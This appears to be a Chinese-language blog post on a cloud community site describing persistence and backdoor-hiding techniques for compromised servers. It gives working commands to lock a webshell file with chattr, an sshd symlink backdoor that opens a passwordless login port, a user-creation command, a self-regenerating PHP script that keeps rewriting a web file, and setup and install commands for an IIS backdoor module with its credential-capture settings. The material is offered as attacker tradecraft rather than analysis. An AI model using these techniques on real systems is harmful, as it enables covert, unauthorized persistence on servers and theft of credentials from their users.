前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >权限维持-后门隐藏技术

权限维持-后门隐藏技术

作者头像
hyyrent
发布2022-12-26 20:24:24
7200
发布2022-12-26 20:24:24
举报
文章被收录于专栏:安全学习记录安全学习记录

文件上锁

代码语言:javascript
复制
chattr +i webshell.php
lsattr webshell.php
chattr -i webshell.php
image-20220323161740166
image-20220323161740166

ssh软链接

代码语言:javascript
复制
ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555;
useradd test -p test
image-20220323161311958
image-20220323161311958
image-20220323163948336
image-20220323163948336
image-20220323161441675
image-20220323161441675

不死马

访问该php文件,会生成一个木马文件用于连接

代码语言:javascript
复制
<?php
  ignore_user_abort(); 
  set_time_limit(0);
  $interval = 5; 
do {
  $filename = 'test.php';
  if(file_exists($filename)) {
    echo "xxx";
  }
  else {
    $file = fopen("test.php", "w");
    $txt = "<?php phpinfo();?>\n";
  fwrite($file, $txt);
  fclose($file);
  }
  sleep($interval);
} while (true);
?>
image-20220323163932612
image-20220323163932612

iis后门

https://github.com/ygwlgGiao/iis-raid-backdoor

使用vs2019进行编译,functions.h可修改配置信息

代码语言:javascript
复制
functions.h
#define COM_HEADER "X-Chrome-Variations"  传输指令和接收数据的头部字段
#define PASS_FILE "C:\\Windows\\Temp\\creds.db"  保存到web请求服务端的位置
#define PASSWORD "SIMPLEPASS"  传输密码
image-20220323171046364
image-20220323171046364

生成后把IIS-Backdoor.dll放到c盘目录下,放置其他目录下面语句要进行适当的更改

代码语言:javascript
复制
C:\Windows\system32\inetsrv\APPCMD.EXE install module /name:iisModule  /image:"c:\IIS-Backdoor.dll" /add:true
python iis_controller.py --url http://x.x.x.x --password SIMPLEPASS
image-20220323165222629
image-20220323165222629

查看iis管理器模块,可发现新增的内容

image-20220323171315820
image-20220323171315820
image-20220323170837304
image-20220323170837304
本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2022-03-23,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 文件上锁
  • ssh软链接
  • 不死马
  • iis后门
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档